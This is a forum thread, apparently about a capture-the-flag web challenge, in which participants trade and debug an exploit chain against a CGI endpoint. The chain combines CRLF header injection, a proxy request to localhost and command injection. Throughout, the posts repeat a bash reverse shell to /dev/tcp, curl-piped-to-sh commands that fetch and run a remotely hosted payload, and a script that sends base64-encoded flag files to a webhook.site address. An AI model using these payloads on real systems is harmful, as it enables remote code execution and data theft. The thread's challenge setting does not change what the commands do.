[randomregister]

any hint for web - cyber attack ?

//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener

curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'

Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`

So the final payload will look like: 

curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'

And as the content of the webhook you can put:

Content-Type text/html
Content:

#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

props you entering http://yourIP, whereas you only need to provide your IP, nothing else

[oyfyic]

//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener

Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`

So the final payload will look like: 

curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'

And as the content of the webhook you can put:

Content-Type text/html
Content:

#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

props you entering http://yourIP, whereas you only need to provide your IP, nothing else

What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this

[0xb4l]

Can someone explain the payload ?? 
And why is "-" working on target ? Because the regex should block the dash ...

[0xhdfg]

any hint for web - cyber attack ?

//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener

curl 'http://94.237.56.65:48210/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bCHANGE(Public IP):CHANGE(Port)|sh)%26name=%0d%0a%0d%0a'

Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`

So the final payload will look like: 

curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'

And as the content of the webhook you can put:

Content-Type text/html
Content:

#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?

[amogussus]

//SOMEONE SENT THIS BUT DOESN'T SEEM TO WORK FOR ME. CAN SOMEONE TRY THIS THEN SEND THE REQUEST THEY ARE USING TO GET THE SHELL


CyberAttack

nc -lvnp 9001

forwardport tcp 9001

index.html

#!/bin/bash
/bin/bash -i >& /dev/tcp/X.X.X.X/9001 0>&1

python -m http.server

forwardport 8000

GET http://94.237.61.48:53693/cgi-bin/attack...d%0a%0d%0a HTTP/1.1

replace X.X.X.X:8000 with the url tath has your hosted file "index.html" tath is just a bash revshell tath will connect on the 9001 listener

Shows the output:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?result=Succesfully attacked ::1%$(curl myip:8000|sh)!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

However nothing on the nc listener. Is there sth I am missing here

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`

So the final payload will look like: 

curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'

And as the content of the webhook you can put:

Content-Type text/html
Content:

#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

The same happens to me, don't really know why I can't call the webhook, because if I do it locally with my machine it works. Any idea?

Same thing here. I tried everything posted in this thread too.

[randomregister]

what is your index.html? instead of revshell can just have a simple one that leaks to webhook/your sever

#!/bin/bash
curl <YOUR WEBHOOK/SERVER>/?flag=`cat /flag*|base64`

So the final payload will look like: 

curl 'http://94.237.55.61:49508/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2bhttps://webhook.site/<WEBHOOK_ID>|bash)%26name=%0d%0a%0d%0a'

And as the content of the webhook you can put:

Content-Type text/html
Content:

#!/bin/bash

curl https://webhook.site/4c227219-d9b7-4b35-8eac-cd20ceb4847a?flag=`cat /flag*|base64`

I have set up the webhook exactly as you have said. Appreciate all the help btw The issue I have now is with the curl command which outputs:

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

props you entering http://yourIP, whereas you only need to provide your IP, nothing else

What do you mean by this. I'm confused rn coz of all the frustration of so many hours trying to do this

try it on your localhost, it will most likely work

[htdgthdsfx]

I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.

[oyfyic]

I'm also getting an error with the webhook. My theory is that the application filters out domain names that don't contain anything. It accepts webhook.site, but not webhook.site/<id webhook>, nor does it accept names that begin with https. I don't know if there's a way to bypass this.

Yeah. Cant seem to get past the filters. Someone who has solved this challenge kindly tell us what you did because it just ain't working out for us

[oyfyic]

on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect

I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

Still not working. Kindly assist

[lala_mong]

on the command injection, if you are curling a https address you need `curl%2b--location%2bx.x.x.x.ngrok-free.app|sh` otherwise it won't follow the redirect

I am using the payload:
$ curl 'http://docker-ip:docker-port/cgi-bin/attack-domain?target=-&name=a%0d%0aLocation:+/a%0d%0aContent-Type:+proxy:http://127.0.0.1/cgi-bin/attack-ip%3ftarget=::1%$(curl%2b--location%2bhttps://webhook.site/<WEBHOOKID>|sh)%26name=%0d%0a%0d%0a'
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="../?error=Hey /var/www/html/a, watch it!">here</a>.</p>
<hr>
<address>Apache/2.4.54 (Debian) Server at 127.0.0.1 Port 80</address>
</body></html>

Still not working. Kindly assist

While working on this challenge, I had some issues with the '/'. Even tho I encoded it 2 times, it was kinda still not working. So instead I used a solve like this :
curl+xx.xx.xx.xx?a=$(ls) just avoid doing any kind of '/', here's the solve :
curl+xx.xx.xx.xx?a=$(cd .. && cd .. && cd .. && cat flag*)
also remember to double encode this.